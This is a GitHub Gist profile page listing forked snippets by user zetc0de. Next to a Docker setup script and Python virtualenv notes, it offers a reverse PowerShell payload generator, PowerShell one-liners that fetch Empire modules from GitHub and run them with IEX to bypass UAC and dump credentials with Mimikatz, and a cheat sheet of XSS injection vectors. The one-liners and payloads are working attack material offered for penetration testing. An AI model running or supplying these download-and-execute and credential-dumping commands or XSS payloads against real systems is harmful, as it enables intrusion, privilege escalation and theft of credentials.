Skip to content

Instantly share code, notes, and snippets.

View zetc0de's full-sized avatar

zetc0de zetc0de

View GitHub Profile
@zetc0de
zetc0de / mkpsrevshell.py
Created November 5, 2020 03:29 — forked from tothi/mkpsrevshell.py
reverse PowerShell cmdline payload generator (base64 encoded)
#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#
import sys
import base64
def help():
print("USAGE: %s IP PORT" % sys.argv[0])
@zetc0de
zetc0de / docker-setup.sh
Last active September 19, 2020 11:04 — forked from myugan/docker-setup.sh
Setup Docker and Compose on Ubuntu 18.04 machine
#!/bin/bash
red="\e[1;31m"
reset="\033[00m"
# Install dependency
echo -e "$red Installing dependencies...$reset"
apt install -y apt-transport-https ca-certificates curl software-properties-common
# Add GPG key
echo -e "$red Add GPG key...$reset"
@zetc0de
zetc0de / PythonVirtualenvMac.md
Created August 28, 2020 02:41 — forked from recto/PythonVirtualenvMac.md
Python 2 and 3 setup with virtualenv on Mac OS X

Python Installation

You can install the latest python 2 and python 3 by homebrew.

  • Python 2 Installation
brew install python
  • Python 3 Installation
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@zetc0de
zetc0de / xss_vectors.txt
Last active September 13, 2021 22:12 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
![xss" onload=alert(1);//](a)
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">